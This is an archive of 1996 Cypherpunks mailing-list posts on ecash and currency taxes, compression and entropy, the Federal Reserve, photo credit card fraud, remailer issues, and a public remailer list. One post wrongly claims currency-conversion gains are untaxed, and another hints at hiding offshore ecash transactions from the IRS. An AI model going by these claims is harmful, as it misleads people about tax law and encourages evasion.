MIME-Version: 1.0
Content-Type: text/plain


At 12:53 PM 4/7/96 PDT, Jim Gillogly wrote:
>
>jim bell <jimbell@pacifier.com> writes:
>>FWIW, I think that there is no capital-gains-type tax on currency 
>>conversions.  In other words, if I take dollars and buy yen today, and the 
>
>I bounced this off a CPA, who said she would be very suprised if this is
>really the case: in general the IRS considers increases in wealth to be
>taxable, and unless there's a specific exclusion for currency transactions
>that she doesn't know about, she suspects this is not the case.  As a
>conceptual counterexample she points out that you are responsible for any
>profit you make from selling your car for more than you pay for it (but,
>as you might expect, you don't get to take a loss if you sell it for less).

That assumes that there is "profit" from exchanging currencies.  On any 
given transaction, there is never any "profit."  The only thing that might 
be called a profit is a difference in exchange rates, and that really isn't 
an increase in wealth at any point.   Ask that CPA to look it up.

This makes sense:  If the currency in my pocket becomes less valuable due to 
inflation, I cannot deduct the loss.  If it becomes MORE valuable due to 
deflation, I do not need to declare the difference as income.  Currency 
transactions only generate "profits" from a change in conversion rates, 
which are simply differences in inflation rate between two currencies.  

>>interconvert rate changes and I convert back and make a "profit," that is 
>>not considered income.  If that's the case, then ecash has an excellent 
>>precedent behind it to avoid any taxes on interest, especially if that
>>interest is, in effect, paid by increasing the inherent value of the
>>currency.
>
>My tame CPA also volunteered the information that the IRS is very interested
>and concerned about how they're going to capture transaction information for
>electronic transactions, and they do think it's in their bailiwick... she's
>read some articles on it.

The answer is, "They're not!"  That's right, you heard me.  It's uphill all 
the way for the IRS.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Mon, 8 Apr 1996 14:11:34 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: e$ seigniorage (and is this the cost of untracability?)
In-Reply-To: <Pine.3.89.9604070949.A1206-0100000@netcom3>
Message-ID: <Pine.OSF.3.91.960407172850.9962A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 7 Apr 1996, Jonathon Blake wrote:

> 
> 	Andorra, Liechenstein, San Marino, St Pierre, all come 
> 	to mind as countries to investigate, because they are 
> 	outside of the United States.  << Has St Pierre joined
> 	NAFTA? If so, that rules them out.  >> 


St.Pierre is an island off of the coast of Canada that belongs to France. 
It cannot join NAFTA (yet <G>)

Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 8 Apr 1996 14:42:01 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u66D6-0008z3C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


The following is a comment of mine that Unicorn didn't respond to.  My 
comments are included as well. I repeat this because I just saw a quote from 
Lysander Spooner which was appropriate under the circumstances.  Those who 
read Unicorn's notes will notice that he frequently ignores embarrassing 
gaffes that he makes.

[beginning of re-quote]


At 08:56 PM 3/30/96 -0500, Black Unicorn wrote:
>> Naturally, you won't address this 
>> problem, but the man-on-the-street is more realistic about his own privacy.  
>> How many times must I raise this issue?  How many times do you ignore it?  
>> Face it, people are smarter than you give them credit for.  They will simply 
>> not tolerate any more shit from the government.
>
>Funny, the latest primary has been one of the highest voter turn outs in 
>quite a while (except in Deleware).  Considering those are the law-and-order 
>types who are most likely to invade personal liberities, I think its a 
>bit hard to make the case that the temper of the country is anything but 
>very pro-political process.

Unicorn again displays his cluelessness.  

If people know that the system is sick, and they believe (even wrongly) that 
the only way to fix the problem is through "the political process,"  they 
can reasonably be expected to take one last, desperate effort at fixing the 
situation.  That doesn't make anybody "pro-political-process," in fact they 
could be disgusted with the lack of progress that this system produces.  
They simply believe that they have no alternative.

To put it in simple terms that even you should be able to understand, the 
fact that a drowning person moves his arms and legs around a lot doesn't 
mean that he LIKES to swim, it may merely mean that he likes drowning even 
less.

[end of re-quote]


Spooner's quote follows:

  "Doubtless the most miserable of men, under the most oppressive
government in the world, if allowed the ballot, would use it, if they
could see any chance of thereby meliorating their condition.  But it
would not, therefore, be a legitimate inference that the government
itself, that crushes them, was one which they had voluntarily set up, or
even consented to."

Lysander Spooner





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 8 Apr 1996 11:54:03 +0800
To: JonWienke@aol.com
Subject: Re: Spinners and compression functions
Message-ID: <199604072252.SAA29569@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



[I've sent a fuller reply to Jon in private mail.]

JonWienke@aol.com writes:
> >Actually, it doesn't. The entropy present from a reasonable source
> >like keyclick timings is much much lower than the output of pkzip is
> >going to suggest to you.
> 
> I am not saying that the output of the compression function has 8 bits of
> entropy per byte, but rather that it will have a more consistent entropy
> level per byte than the input to the function.

What makes you think that? There is little to no cause to expect this
at all. I can think of a number of instances, like image data streams,
where this idea is completely unfounded for most conventional
compression techniques.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 8 Apr 1996 16:01:27 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199604080427.VAA04452@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:55 PM 4/7/96 -0800, jim bell wrote:
> Those who 
> read Unicorn's notes will notice that he frequently ignores embarrassing 
> gaffes that he makes.

Those who read Jim Bell's notes will notice that Unicorn is not alone
in this practice.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Mon, 8 Apr 1996 15:30:34 +0800
To: cypherpunks@toad.com
Subject: Re: Spinners and compression functions
Message-ID: <199604080336.UAA16840@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:52 PM 4/7/96 -0400, perry@piermont.com wrote:
>JonWienke@aol.com writes:
>> I am not saying that the output of the compression function has 8 bits of
>> entropy per byte, but rather that it will have a more consistent entropy
>> level per byte than the input to the function.
>What makes you think that? There is little to no cause to expect this
>at all. I can think of a number of instances, like image data streams,
>where this idea is completely unfounded for most conventional
>compression techniques.

Obviously you need to mix raw data with a hash function if you really
want to smear out the entropy so there's an even amount per output byte.
But lossless compression can gain you a little bit, and seldom hurts
(assuming it's faster than the hash), and it can help you be less 
unrealistic about the amount of entropy you've really got.

Data contains varying quantities of predictablity and unpredictability.
Some of the predictability has simple enough structure that a basic
compression function can find and exploit it to squash the data.
Some of the predictability doesn't.  For what it's worth, compressing
the data before using it for other things does leave you with somewhat
more consistent entropy per byte for "typical" random input, because it
eliminates the easy stuff.  Obviously there are cases where this doesn't
help you much, like inputting a graphic representation of a column of
Chinese characters, where you'd benefit a lot more by looking them up
and outputting Unicode or some such and then compressing (and where the 
first time you encounter a given character, the output of the compression
function has to represent the picture, where the next time it sees the
same set of input bits, it's able to abbreviate much more.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 8 Apr 1996 16:45:14 +0800
To: cypherpunks@toad.com
Subject: They're running scared.
Message-ID: <m0u68el-0008yhC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Hoagland's newspaper column from April 4, 1996:

Governments awakening to threat of the Internet

The computer and modem now downsize the globe, enabling citizens to vault 
over walls of secrecy, law and control erected by governments.

Still gathering steam, the information revolution is creating a new 
generation of ticklish foreign policy and national security problems for the 
world's governments.  They are organized to operate in a heirarchical world 
of borders and customs posts and to keep out the unwanted, the unhealthy or 
the dangerous.

But the boundaries of cyberspace are unfixed and amorphous.  They are being 
determined more by the availability and cost of communication modems, 
sophisticated software, satelite stations, encryption techniques and other 
data processing technology than by government fiat.

An example of cyberspace's potential for harm surfaced last week when France 
asked the United States to crack down on a San Diego-based Islamic group 
that posts instructions on the Internet for assembling inexpensive bombs 
like those exploded on the Paris subways last year.

French officials traveling or posted abroad fear they are the intended 
targets of these homemade bombs, the Quai D'Orsay's senior Middle East 
expert, Denis Bouchard, told American diplomats at a meeting last week on 
international terrorism in Washington.

State Department officials offered the French sympathy.  But they did not 
hold out much hope they coudl act on the sparse information the French 
provided.  The line between computer-driven incitement to terrorism and 
electronic free speech still has to be drawn in the brave new cyber world.

The inchoate nature of that world was underscored by the disclosure March 29 
that U.S. authorities had charged an Argentine student with three felonies 
for illegally entering Pentagon and other U.S. military computers to 
obtaining confidential files on satellites, radiation and energy-related 
engineering.

But Julio Cesar Ardita, 22, who raided Washington files from his home in 
Buenos Aires, cannot be extradited under American-Argentine treaties, which 
do not cover these alleged national security violations.

Governments are waking late to the implications of individuals and small 
groups operating across boundaries and oceans to bypass, introde upon or 
flip and electronic finger at bureaucracies that have controlled or 
regulated the security and business of nations for centuries.  The 
implications are particularly dramatic for totalitarian regimes that brook 
no open dissent.

China seeks to impose a government monopoly over economic data transmission 
into China to go along with the draconian political censorship already 
practiced on the nation's traditional media.  But as long as the Middle 
Kingdom remains part of the International telephone system with its faxing 
and modem capabilities, words and facts the communist leadership abhors will 
spread faster than Big Brother can track them.

The world stands roughly where it stood as television began to reshape 
politics, and policy-making, in ways that we still do not fully understand.  
A new communication technology arrives to change what we think, as well as 
how we think and communicate.

Traditionalists fear anarchy (or obsolescence).  Optimists foresee the best 
of all worlds, with Orwell's 1984 predictions of Big Brother tracking and 
brainwashing everyone through television proven to have been 180 degrees off 
course.

But the picture is in fact  mixed.  Governments have begun to talk seriously 
to each other about controlling the computer revolution.  The Pentagon is 
studying the information highway as the route to complete domination of the 
battlefield and thus the ultimate source of power.  THe FBI, IRS, and CIA 
are determined to keep you from being able to encode and transmit 
information they want to see.

Orwell may turn out to have been premature, but not wrong.  The struggle 
over the course of the information revolution is only beginning.  The 
bureaucracies that are most threatened still have powerful hands to play.  
There is no guarantee that cyberspace will provide the world with the era of 
new freedoms that now seem likely.  That battle is still to be fought, and won.

[end of article]


Articles such as this are interesting because they appear to be written 
without any illusion that the interests of governments are anything other 
than just that, interests of governments.  They are NOT the interests of the 
average citizen.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O. Trotter, III" <fotiii@crl.com>
Date: Mon, 8 Apr 1996 17:33:17 +0800
To: cypherpunks@toad.com
Subject: Re: the cost of untracability?
Message-ID: <199604080217.AA24295@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> FWIW, I think that there is no capital-gains-type tax on currency 
> conversions.  In other words, if I take dollars and buy yen today, and the 
> interconvert rate changes and I convert back and make a "profit," that is 
> not considered income.  If that's the case, then ecash has an excellent 
> precedent behind it to avoid any taxes on interest, especially if that 
> interest is, in effect, paid by increasing the inherent value of the currency.
> 
> And most of the "interest" will simply be the avoided inflation loss that 
> would have otherwise occurred.  Buying ecash may be equivalent to buying an 
> absolutely non-inflating currency that the government can't manipulate.
> 
> Jim Bell
> jimbell@pacifier.com
>
There is a tax event that occurs when one converts from one currency 
to another (be it capital or current).  In your example the purchase 
of Yen and later sale may result in a gain if the Yen appreciates, or 
a loss if it drops.  This is a taxable event.

You actually refer to the method that was used in the 14th - 16th 
century in europo to pay interest when it was against church (really 
"Church") law.  Early banks would do currency or metals-to-currency 
trades with people and imply a rent or interest rate.  It was also 
the begining of the discount trade bill (I'll give you 90 cents 
today  and get your dollar in a year from the person you sold those 
chairs to).

I'll still cling to my Ecash is curency not a currency agument as 
well BTW.

Frank O. Trotter, III  -   fotiii@crl.com
www.marktwain.com  - Fax: +1 314 569-4906
--------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Mon, 8 Apr 1996 17:41:46 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: e$ Signorage
In-Reply-To: <199604071620.MAA14286@jekyll.piermont.com>
Message-ID: <Pine.SV4.3.91.960407214309.2856A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Sun, 07 Apr 1996 12:20:11 -0400
> From: Perry E. Metzger <perry@piermont.com>
> 
> whatever makes no difference to the amount of fake interest earned. I
> say "fake interest" because it isn't real income to the government at
> all.

    When the Fed buys government bonds, the interest income goes to the 
owners of the Federal Reserve Bank. The Federal Resreve Bank is _not_ a 
government agency - it is privately owned by the member banks..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 8 Apr 1996 14:40:35 +0800
To: Alan Horowitz <alanh@mailhost.infi.net>
Subject: Re: e$ Signorage
In-Reply-To: <Pine.SV4.3.91.960407214309.2856A-100000@larry.infi.net>
Message-ID: <199604080206.WAA29767@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Horowitz writes:
> > Date: Sun, 07 Apr 1996 12:20:11 -0400
> > From: Perry E. Metzger <perry@piermont.com>
> > 
> > whatever makes no difference to the amount of fake interest earned. I
> > say "fake interest" because it isn't real income to the government at
> > all.
> 
>     When the Fed buys government bonds, the interest income goes to the 
> owners of the Federal Reserve Bank.

Nope, sorry. Some of the interest is used to fund the Fed overhead
itself -- salaries, heat, electricity and the like. The rest is
"returned" to the treasury (actually, it was never paid out in the
first place and it was all funny money to begin with.)

> The Federal Resreve Bank is _not_ a 
> government agency - it is privately owned by the member banks..

Also false. All of the board of governors of the Fed are government
appointees. In some theoretical sense the Fed isn't part of the
government, but in all practical terms it is. Greenspan has to worry
about whether Bill Clinton is going to reappoint him and congress will
reconfirm him, not about whether the member banks think he's doing a
good job.

The myth that the fed is a private entity is an enduring one in
conspiracy theory circles, but its trivial to check that it isn't the
case.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 8 Apr 1996 17:15:42 +0800
To: cypherpunks@toad.com
Subject: my apologies
Message-ID: <199604080212.WAA01180@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



My apologies about getting drawn into an argument about conspiracy
theory and whether the fed is "privately owned" or some such bull. It
isn't cypherpunks material. We all forget on occassion.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddfr@best.com (david friedman)
Date: Mon, 8 Apr 1996 20:56:14 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <v02130502ad8dd64ae9b2@[205.149.171.135]>
MIME-Version: 1.0
Content-Type: text/plain


Unicorn wrote:

> No ISP in its right mind is going to ask for trouble.  If I'm a
>prosecutor and I suspect that the ISP may be complicit in hiding
>evidence, I'm going to ask for a search and seizure warrant (a la sun
>devil) and just walk in and take the equipment I believe the data to be
>on and then satisify myself that it's unattainable.

Last semester I taught a seminar on computers, crime, and privacy and we
had, as a guest lecturer one evening, Silicon Valley's one full time
computer cop (he works for the SC County D.A.'s office). One of his
comments was that ISP's were generally very cooperative, because they knew
that he could legally impose large costs on them by seizing their systems
as evidence.

David Friedman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 8 Apr 1996 17:21:22 +0800
To: ebear@laplaza.taos.nm.us (Bear Albrecht)
Subject: Re: Why sign pubkey?
Message-ID: <ad8e59160002100407e9@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the post. There is someone with a quite legitimate reason to
sign a newly generated public key with "Norman Hardy" in the user id string
but without my my e-mail address. He is one of the several other Norman
Hardy's in the U.S.  I could include a very short biography which would fix
that ambiguity.

I only send secrets to people that I have some reason to trust. I gain
trust sometimes from having met someone in person and talked for a few
hours. If I get a business card with a key finger print and e-mail address
(or URL) then I am safe from such spoofing as described in your post. Her
name plays no role in the transaction.

If I trust her because you recommended her to me, then perhaps I can get a
fingerprint and URL from you. Again I need no name.

In both of these cases the URL is merely a convenience. If she moves her
web page, a search engine will soon find it given a part of the finger
print included in the web page. Unless the attacker has compromised the
search engine, I need merely send mail enciphered by her public key to the
e-mail address given in each web page claiming to own the public key. Only
she will be able to read the mail.

Recommendation:
  Put URL & finger print on business cards.
  Include URL and finger print in recommendations.

  To send a secure message to some whose URL & trusted print you have:
    Check the URL for a public key whose print matches the trusted print.
      If that fails use a search engine for a better URLs.
    Send mail to each e-mail address found on a web page passing the test.

Recommendations should include a little text about what things the designee
should trusted with. Programs like PGP that follow trust chains should
display the text from each recommendation in the chain.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Mon, 8 Apr 1996 20:17:03 +0800
To: cypherpunks@toad.com
Subject: Re: the cost of untracability?Re: the cost of untracability?
Message-ID: <199604080650.XAA01741@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


[Please excuse the minor taxpunks diversion; there's a relevant point
here, aside from the fact that we're approaching April 15 and 
discussing technologies that will let some people not care if they're
approaching April 15 in a few years :-]

At 09:28 AM 4/7/96 -0800, Jim Bell wrote:
>FWIW, I think that there is no capital-gains-type tax on currency 
>conversions.  In other words, if I take dollars and buy yen today,
>and the interconvert rate changes and I convert back and make a 
>"profit," that is not considered income. 

What it's worth is fairly minimal, i.e. the IRS doesn't see it that way.
If you did transaction Y and then transaction X and now have $100 more
than you did before you started, they think that's capital gain, 
whether you were buying and selling Yen, soybeans, or mutual funds.
The only difference if you're buying and selling ecash from Bank Foo
is that it may be easier to not tell them about the transaction if it
were all encrypted and outside your home jurisdiction.  What they don't
know won't hurt them...

On the other hand, depending on what country your bank is in, 
there may be taxes or fees or bribes charged by the bank's home country, 
which would get passed along to you either directly or indirectly.

> And most of the "interest" will simply be the avoided inflation loss
> that would have otherwise occurred.  Buying ecash may be equivalent
> to buying an absolutely non-inflating currency that the government 
> can't manipulate.

No, it's equivalent to buying private-bank currency, which may be
denominated in dollars or ECUs or gold or yen or pesos or zorkmids,
which may be inflatable by some government, or may be backed only
by the full faith and credit of the anonymous remailer in Panama
that you reach your ostensibly Cayman-Islands e-bank through.

Now for the slight cypherpunks relevance - assuming that you're banking
in some currency other than your home country's government's, 
whether it's hard currency like Swiss Francs or soft metal like gold
or a mixture like ECUs or shares of Fidelity Mercury Fund,
if you to pay taxes on the net result of transactions, 
you'll probably want a timestamped log of what you did when,
and ideally a good data set of the highest, lowest, and instantaneous
prices of the backing currency on several markets, so you can
report your profits and losses pessimistically.  (For most kinds
of accounts, you'd want those sources to be totally separate,
but for captive currencies like BankFoo Non-Inflatable Zorkmids,
you might want to get them together, though you might want to have
two accounts, one of which is quiet and subscribes to the price reports
and another where your real transactions happen.)

                            Alice du Gnome-ynous.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 8 Apr 1996 20:03:57 +0800
To: cypherpunks@toad.com
Subject: (Fwd) British Study Claims That Photo Credit Cards Don't Work
Message-ID: <199604080500.BAA19015@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


This comes from the FTC Privacy List, and is somewhat relevant....
(The the "Crypto" in the title isn't, oddly...).

Some thoughts... (er, questions):
1. What are the implications for log-on systems that rely on 
recognition of faces (supposedly impossible for hackers to describe 
and exploit)?
2. Legal implications for witnesses?

------- Forwarded Message Follows -------
Date:          Sun, 7 Apr 1996 08:24:18 -0700
From:          taxhaven@ix.netcom.com (Adam Starchild )
Subject:       British Study Claims That Photo Credit Cards Don't Work
To:            privacy@ftc.gov

                 "Crypto-ID" Cards Not Effective

     Recent studies into the effectiveness of photo credit cards
have cast doubt over their ability to cut fraud.  Dr. Richard
Kemp, of the Department of Psychology at Westminster University,
London, organized an experiment involving a London supermarket to
test the cards in "the real world."
     The supermarket was staffed by six people who were all
warned to be on the look out for fraudulent credit cards.  Dr.
Kemp arranged for 44 of his students to pose as shoppers and test
the staffs' ability to spot photo-card misuse.  Each student was
armed with four cards.  One showed the student as they were, one
showed the student wearing make-up, one showed an individual who
vaguely resembled the student and the last card depicted someone
who looked nothing like the bearer.
     People usually recognize photographs of individuals based on
a familiarity of the subject.  A photograph captures only one
angle and expression out of thousands of different combinations. 
People will recognize photographs of family, friends and well
known individuals easily.  But how easy is it to accurately
compare a photograph with the face of a perfect stranger?  At a
recent conference, Dr. Kemp said that matching a photo to a
stranger's face was "too difficult."  He also said that in a non-
experimental situation, such as a supermarket, the incidence of
fraud detection would be even lower.
     The results of Dr. Kemp's supermarket experiment proved very
interesting.  In all, the majority of fraudulent cards were
accepted.  Amazingly, 35 per cent of the cards bearing a
photograph of someone completely different from the student were
accepted.  A massive 64 per cent of cards bearing a similar
individual were also accepted.  Another factor which seems to
further prove Dr. Kemp's point is that 14 per cent of cards
bearing a true likeness of the student were rejected.
     A few British banks are already offering customers the
opportunity to have their photograph etched onto their cards. 
They claim a reduction in fraud has resulted from this.  Dr.
Kemp's findings would seem to contradict this belief.  Dr. Nicky
Towell, one of Dr. Kemp's researchers, said "There is a widely
held assumption that photo credit cards are a cheap and effective
way of stopping fraud.  But this is not the case."
     No one can tell how well photo credit cards will catch on. 
But with the majority of people carrying at least one, if not
more cards of some sort, how long will it be before photos become
compulsory?  The government knows that the introduction of ID
cards is a political hot potato, but how many people would notice
if they turned the cards we already have into crypto-ID cards?


Reprinted from The Mouse Monitor, The International Journal of
Bureau-Rat Control, a periodical published by Scope International
for its customers.  Scope International is on the Worldwide Web
at http://www.britnet.co.uk/Scope/


Posted by Adam Starchild
     The Offshore Entrepreneur at http://www.au.com/offshore



The privacy list is run automatically by the Majordomo list manager.
Send a "help" command to majordomo@ftc.gov for assistance.

Rob. 

---
Send a blank message with the subject "send pgp-key"
to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Mon, 8 Apr 1996 19:54:18 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: the cost of untracability?
In-Reply-To: <m0u65hy-0008ynC@pacifier.com>
Message-ID: <Pine.OSF.3.91.960408012840.5780D-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 7 Apr 1996, jim bell wrote:

> That assumes that there is "profit" from exchanging currencies.  On any 
> given transaction, there is never any "profit."  The only thing that might 
> be called a profit is a difference in exchange rates, and that really isn't 
> an increase in wealth at any point.   Ask that CPA to look it up.

If I recall correctly, don't currency traders make REAL money by doing 
just that. By moving money into different currencys and taking advantage 
of minor fluctuations and differences in exchange rates at different 
exchanges, these traders sometimes make a LOT of REAL money. I am not 
sure, but I think that it is called arbitrage trading or something like that.

Just my $.02 US - $.05 Canadian <G>

Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Mon, 8 Apr 1996 17:17:51 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Australia's New South Wales tries net-censorship
Message-ID: <v02140b01ad8e4283e85d@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:47 4/6/96, David K. Merriman wrote:

>Makes me wonder if browser companies/authors couldn't be dragged into any
>such conflicts. If Person A inadvertently stumbles across Pedophiles 'R' Us
>on the net, and quickly moves on, I have yet to see a browser that lets
>him/her say "quick - delete that last cacheing operation", thus *making*
>him/her 'guilty' of criminal possession.

Netscape in the Cache Preferences has a button to delete your cache
contents so button would seem to serve this need (while being a little
overkill for this capability since it deletes everything and you must then
rebuild your cache from scratch).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Mon, 8 Apr 1996 20:10:19 +0800
To: walter@cithe302.cithep.caltech.edu (Chris Walter)
Subject: Re: Someone's screwing around with anon.penet.fi
Message-ID: <v02140b02ad8e488551b4@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:37 4/6/96, Chris Walter wrote:

>In article
><cypherpunks.Pine.BSF.3.91.960406114609.5026B-100000@kirk.edmweb.com>
>Steve Reid <steve@edmweb.com> writes:
>
>>   Here's another one of them unsolicited messages from anon.penet.fi.
>
>I also got one of these right after I posted to cypherpunks.  I
>normally just lurk, and the address that was used is the machine I
>read and post news on(we have a gateway to the mailing list).  So I am
>pretty sure it is related to my posting to cypherpunks.
>
>I have written to the administrators at anon.penet.fi asking about this
>and informing them.  I'll pass on any relevant info they send me.

While taking to anon.penet.fi will help, the one to talk to is the list
owner and ask them to clean up their act. They should either reject any
attempt to use ANxxx@anon.penet.fi IDs in lieu of the correct
NAxxx@anon.penet.fi form, automatically convert the registration to
NAxxx@anon.penet.fi, or parse the membership list for ANxxx@anon.penet.fi
IDs and fix them to the NAxxx form. If the list is run by Majordomo, there
is a patch that fixes the problem by correcting the address list [or it may
be outgoing address] (and I think keeping it clean at subscribe time).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Mon, 8 Apr 1996 18:12:44 +0800
To: stewarts@ix.netcom.com
Subject: Re: Someone's screwing around with anon.penet.fi
Message-ID: <v02140b03ad8e4a21b288@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:55 4/6/96, stewarts@ix.netcom.com wrote:

>The way to prevent this whole mess is to educate majordomo to turn
>subscription requests from anXXXXXX@anon.penet.fi into naXXXXXX@anon.penet.fi,
>or at least to block subscription requests form anXXXXXX@anon.penet.fi.


As I've noted, such a patch already exists - it just must be installed by
the Maintainer of the Majordomo copy at the Provider.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 8 Apr 1996 19:11:23 +0800
To: cypherpunks@toad.com
Subject: Re: .sig followup
Message-ID: <9604080657.AD09420@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



>The media coverage of the sensationalist (violent and/or sexual) crime 
>has given the law makers and enforcers an excuse to step things up. It's 
>not quite as bad up here in Canada, but where the US goes, Canada 
>(and probably the rest of the world) usually follows.

Hey, we got the new gun control bill up here.  Mandatory registration of all 
firearms by year xxxx (I forgot).

Other things are coming.  Yesterday, a minister of Quebec province declared that
the ownership of a house is a *privilege*, and therefore, can be seized for non
payment or evasion of income tax.  Next thing we'll know, they'll put a
luxury tax
on the breathing of air...

>This is my first post to the Cypherpunks... So what government black 
>lists does this get me on?

Is there anybody that have an informed answer to that question?

JFA

 PGP 2048 bits key at:     http://w3.citenet.net/users/jf_avon
 ID:C58ADD0D  52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 9 Apr 1996 03:10:26 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199604081350.GAA03874@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
